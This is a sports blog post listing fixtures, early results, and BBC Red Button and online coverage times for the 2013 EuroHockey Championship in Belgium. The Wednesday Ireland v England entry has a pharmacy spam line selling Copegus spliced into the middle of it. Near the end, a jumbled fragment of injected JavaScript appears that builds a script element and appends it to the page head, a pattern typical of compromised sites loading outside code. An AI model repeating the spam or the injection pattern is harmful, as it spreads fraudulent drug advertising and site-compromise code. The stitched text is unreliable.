With the TriFinance EuroHockey Championship 2013 in full swing, here’s a list of fixtures and what coverage of what games you can watch on a plethora of digital outlets, including the BBC Red BUtton and online.

Some of the latest scores have just come in too!

The tournament is held in Boom, Belgium.

All times listed below are BST and full coverage of the home nation games can be found on the BBC.

For more information about the TriFinance EuroHockey 2013 tournament, head to http://www.eurohockey.org/ehf/

Saturday 17 August

Men’s Pool A

Spain 6-1 Czech Republic

Germany 1-2 Belgium

Women’s Pool A

Belgium 5-1 Belarus

Netherlands 6-0 Ireland

Women’s Pool B

England 3-0 Spain

Germany 1-0 Scotland

Sunday 18 August

Men’s Pool B

England 5-2 Poland

17:00 Netherland’s v Ireland – Online, Connected TV

Women’s Pool A

15:00 Ireland v Belarus – Online, Connected TV

19:00 Belgium v Netherlands

Women’s Pool B

11:00 Spain v Scotland – Red Button, Red Button HD, Online, Connected TV

13:00 Germany v England – Red Button, Red Button HD, Online, Connected TV

Monday 19 August

Men’s Pool A

13:00 Spain v Germany

17:00 Belgium v Czech Republic

Men’s Group B

15:00 Ireland v Poland – Red Button, Red Button HD, Online, Connected TV

19:00 England v Netherlands – Red Button, Red Button HD, Online, Connected TV

Tuesday 20 August

Women’s Pool A

17:00 Ireland v Belgium – Red Button, Red Button HD, Online, Connected TV

19:00 Netherlands v Belarus

Women’s Pool B

13:00 England v Scotland – Red Button, Red Button HD, Online, Connected TV

15:00 Spain v Germany

Wednesday 21 August

Men’s Pool A

15:00 Germany v Czech Republic

17:00 Belgium v Spain

Men’s Pool B

10:30 Ireland v England – Red Button, Red Button HD, You don’t want to spend more than needed for your Copegus. This is why you can get it for 7.1 USD right here, right now! Online, Connected TV

19:00 Netherlands v Poland

Thursday 22 August

Women’s tournament

13:00 4th Pool A v 4th Pool B

15:00 3rd Pool A v 3rd Pool B

17:00 Semi-final 1

19:30 Semi-final 2

Friday 23 August

Men’s tournament

13:00 4th Pool A v 4th Pool B

15:00 3rd Pool A v 3rd Pool B

17:00 Semi-final 1

19:30 Semi-final 2

Saturday 24 August

Women’s tournament

08:00 3rd Pool A v 4th Pool B

10:00 3rd Pool B v 4th Pool A

12:30 Third-place play-off

15:00 Final

Sunday 25 August

Men’s tournament

08:00 3rd Pool A v 4th Pool B

10:00 3rd Pool B v 4th Pool A

12:30 Third-place play-off

15:00 Final

}d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

 

Leave a Reply